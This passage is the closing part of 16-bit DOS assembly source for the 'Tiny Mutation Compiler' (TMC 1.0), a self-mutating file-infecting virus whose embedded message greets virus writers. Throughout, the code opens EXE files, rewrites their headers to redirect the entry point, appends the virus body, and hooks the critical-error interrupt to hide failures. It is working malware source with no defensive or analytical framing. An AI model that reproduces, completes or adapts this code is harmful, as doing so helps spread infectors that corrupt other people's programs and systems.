; Beginning of block dw 0fah ; Block identification of close_file db 02h ; Two bytes instruction mov ah,3eh ; Close file db 02h ; Two bytes instruction int 21h db 11101001b ; JMP imm16 (opcode 0e9h) dw 1771h ; Pointer to int24_store db 11101111b ; End of block int24_store db 11101110b ; Beginning of block dw 1771h ; Block identification of int24_store db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction pop ds ; Load DS from stack db 03h ; Three bytes instruction mov ax,2524h ; Set interrupt vector 21h db 02h ; Two bytes instruction int 21h db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fbh ; Pointer to int21_exit db 11101111b ; End of block int21_exit db 11101110b ; Beginning of block dw 0fbh ; Block identification of int21_exit db 01h ; One byte instruction pop es ; Load ES from stack db 01h ; One byte instruction pop ds ; Load DS from stack db 01h ; One byte instruction pop di ; Load DI from stack db 01h ; One byte instruction pop si ; Load SI from stack db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction pop bx ; Load BX from stack db 01h ; One byte instruction pop ax ; Load aX from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0c9h ; Pointer to int21_jump db 11101111b ; End of block int21_jump db 11101110b ; Beginning of block dw 0c9h ; Block identification of int21_jump db 05h+10h ; Five bytes data db 11101010b ; JMP imm32 (opcode 0eah) dd 00h ; address of interrupt 21h db 11101111b ; End of block infect_exe db 11101110b ; Beginning of block dw 138dh ; Block identification of infect_exe db 02h ; Two bytes instruction mov al,01h ; EXE executable db 03h ; Three bytes instruction mov ds:[1234h],al ; Store executable status db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 03h ; Three bytes instruction mov ax,4200h ; Set current file position (SOF) db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction xor dx,dx ; CX = low-order word of offset fi... db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 02h ; Two bytes instruction mov ah,3fh ; Read from file db 03h ; Three bytes instruction mov cx,18h ; Read twenty-four bytes db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of exe_header db 11101101b ; Data reference dw 138fh ; Pointer to exe_header db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction mov si,1234h ; SI = offset of exe_header db 11101101b ; Data reference dw 138fh ; Pointer to exe_header db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 04h ; Four bytes instruction cmp [si+0ch],0ffffh ; Maximum paragraphs to allocate ...? db 01110100b+10000000b ; Equal? Jump to maximum_mem dw 1399h ; Pointer to maximum_mem db 03h ; Three bytes instruction mov ax,[si+04h] ; AX = total number of 512-byte pa... db 01h ; One byte instruction inc ax ; Increase total number of 512-byt... db 02h ; Two bytes instruction mov cl,05h ; Divide by thirty-two db 02h ; Two bytes instruction shl ax,cl ; AX = total number of 512-byte pa... db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... db 11101001b ; JMP imm16 (opcode 0e9h) dw 1399h ; Pointer to maximum_mem db 11101111b ; End of block maximum_mem db 11101110b ; Beginning of block dw 1399h ; Block identification of maximum_mem db 03h ; Three bytes instruction add ax,[si+0ch] ; Add maximum paragraphs to alloca... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store size of memory block in pa... db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 03h ; Three bytes instruction mov ax,[si+0eh] ; AX = initial SS relative to star... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial SS relative to sta... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction mov ax,[si+10h] ; AX = initial SP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial SP db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 03h ; Three bytes instruction mov ax,[si+14h] ; AX = initial IP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial IP db 11101101b ; Data reference dw 138bh ; Pointer to initial_ip_ db 03h ; Three bytes instruction mov ax,[si+16h] ; AX = initial CS relative to star... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial CS relative to sta... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 03h ; Three bytes instruction mov ax,14h ; AX = probability of storing inco... db 04h ; Four bytes instruction cmp ds:[1234h],ax ; Store incorrect IP? db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 01110111b+10000000b ; Above? Jump to set_file_pos dw 1775h ; Pointer to set_file_pos db 01h ; One byte instruction push bp ; Save BP at stack db 01h ; One byte instruction push ds ; Save DS at stack db 01h ; One byte instruction pop es ; Load ES from stack (DS) db 03h ; Three bytes instruction mov bp,40h ; Random number within sixty-four db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 01h ; One byte instruction pop bp ; Load BP from stack db 03h ; Three bytes instruction add ax,[si+14h] ; Add initial IP to random number ... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store incorrect IP db 11101101b ; Data reference dw 1773h ; Pointer to incorrec_ip db 11101001b ; JMP imm16 (opcode 0e9h) dw 1775h ; Pointer to set_file_pos db 11101111b ; End of block set_file_pos db 11101110b ; Beginning of block dw 1775h ; Block identification of set_file... db 03h ; Three bytes instruction mov ax,4202h ; Set current file position (EOF) db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction xor dx,dx ; DX = high-order word of offset f... db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction cmp dx,06h ; Filesize too large? db 01110111b+10000000b ; Above? Jump to write_virus dw 0fah ; Pointer to close_file db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 03h ; Three bytes instruction mov cx,200h ; Divide by pages db 02h ; Two bytes instruction div cx ; DX:AX = filesize in pages db 01h ; One byte instruction inc ax ; Increase total number of 512-byt... db 03h ; Three bytes instruction cmp [si+04h],ax ; Internal overlay? db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 01110101b+10000000b ; Not equal? Jump to close_file dw 0fah ; Pointer to close_file db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 05h ; Five bytes instruction mov [si+0ch],0ffffh ; Store maximum paragraphs to allo... db 05h ; Five bytes instruction mov [si+10h],7ffeh ; Store initial SP db 05h ; Five bytes instruction mov word ptr [si+14h],00h db 03h ; Three bytes instruction mov cx,10h ; Divide by paragraphs db 02h ; Two bytes instruction div cx ; DX:AX = filesize in paragraphs db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... db 01h ; One byte instruction inc ax ; Increase initial CS/SS relative ... db 03h ; Three bytes instruction mov [si+0eh],ax ; Store initial SS relative to sta... db 03h ; Three bytes instruction mov [si+16h],ax ; Store initial CS relative to sta... db 03h ; Three bytes instruction mov ax,[si+04h] ; AX = total number of 512-byte pa... db 01h ; One byte instruction inc ax ; Increase total number of 512-byt... db 02h ; Two bytes instruction mov cl,05h ; Divide by thirty-two db 02h ; Two bytes instruction shl ax,cl ; AX = total number of 512-byte pa... db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... db 03h ; Three bytes instruction add ax,[si+0ah] ; Add maximum paragraphs to alloca... db 02h ; Two bytes instruction mov di,ax ; DI = minimum paragraphs to alloc... db 01h ; One byte instruction pop cx ; Load CX from stack (DX) db 01h ; One byte instruction pop dx ; Load DX from stack (AX) db 03h ; Three bytes instruction and dx,1111111111110000b db 03h ; Three bytes instruction add dx,10h ; DX = low-order word of offset fr... db 03h ; Three bytes instruction adc cx,00h ; CX = high-order word of offset f... db 03h ; Three bytes instruction mov ax,4200h ; Set current file position (SOF) db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction add ax,1234h ; AX = length of virus db 11101101b ; Data reference dw 66h ; Pointer to virus_end db 03h ; Three bytes instruction adc dx,00h ; Convert to 32-bit db 03h ; Three bytes instruction mov cx,200h ; Divide by pages db 02h ; Two bytes instruction div cx ; DX:AX = filesize in pages db 03h ; Three bytes instruction mov [si+02h],dx ; Store number of bytes in last 51... db 01h ; One byte instruction inc ax ; Increase total number of 512-byt... db 03h ; Three bytes instruction mov [si+04h],ax ; Store total number of 512-byte p... db 05h ; Five bytes instruction mov [si+0ah],800h ; Store minimum paragraphs of memo... db 01h ; One byte instruction inc ax ; Store total number of 512-byte p... db 02h ; Two bytes instruction mov cl,05h ; Divide by thirty-two db 02h ; Two bytes instruction shl ax,cl ; AX = total number of 512-byte pa... db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... db 03h ; Three bytes instruction add ax,[si+0ah] ; Add maximum paragraphs to alloca... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store new size in paragraphs db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 02h ; Two bytes instruction sub di,ax ; DI = additional minimum paragrap... db 01110110b+10000000b ; Below or equal? Jump to dont_add... dw 1396h ; Pointer to dont_add_mem db 03h ; Three bytes instruction add [si+0ah],di ; Add additional minimum paragraph... db 11101001b ; JMP imm16 (opcode 0e9h) dw 1396h ; Pointer to dont_add_mem db 11101111b ; End of block dont_add_mem db 11101110b ; Beginning of block dw 1396h ; Block identification of dont_add... db 06h ; Six bytes instruction mov word ptr ds:[01h],00h db 02h ; Two bytes instruction mov ah,40h ; Write to file db 02h ; Two bytes instruction xor dx,dx ; Zero DX db 03h ; Three bytes instruction mov cx,1234h ; CX = length of virus db 11101101b ; Data reference dw 66h ; Pointer to virus_end db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction xor dx,dx ; DX = low-order word of offset f... db 03h ; Three bytes instruction mov ax,4200h ; Set current file position (SOF) db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 02h ; Two bytes instruction mov ah,40h ; Write to file db 02h ; Two bytes instruction mov dx,si ; DX = offset of exe_header db 03h ; Three bytes instruction mov cx,18h ; Write twenty-four bytes db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 11101001b ; JMP imm16 (opcode 0e9h) dw 138eh ; Pointer to set_file_inf db 11101111b ; End of block int24_virus db 11101110b ; Beginning of block dw 1770h ; Block identification of int24_virus db 02h ; Two bytes instruction mov al,03h ; Fail system call in progress db 01h ; One byte instruction iret ; Interrupt return db 11101111b ; End of block exe_header db 11101110b ; Beginning of block dw 138fh ; Block identification of exe_header db 18h+10h ; Twenty-four bytes data db 18h dup(00h) ; EXE header db 11101111b ; End of block file_time db 11101110b ; Beginning of block dw 12ch ; Block identification of file_time db 02h+10h ; Two bytes data dw 00h ; File time db 11101111b ; End of block file_date db 11101110b ; Beginning of block dw 12dh ; Block identification of file_date db 02h+10h ; Two bytes data dw 00h ; File date db 11101111b ; End of block message db 11101110b ; Beginning of block dw 2328h ; Block identification of message db (message_end-messag_begin)+10h messag_begin db 0dh,0ah db 0dh,0ah db 'þ TMC 1.0 by Ender from Slovakia þ',0dh,0ah db 'Welcome to the Tiny Mutation Compiler!',0dh,0ah db 'Dis is level 42.',0dh,0ah db 'Greetings to virus makers: Dark Avenger, Vyvojar, Hell Angel',0dh,0ah db 'Personal greetings: K. K., Dark Punisher',0dh,0ah db 0dh,0ah message_end: db 11101111b ; End of block db 00h ; End of table code_end: table_end: end code_begin ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[tmc_b.asm]ÄÄÄ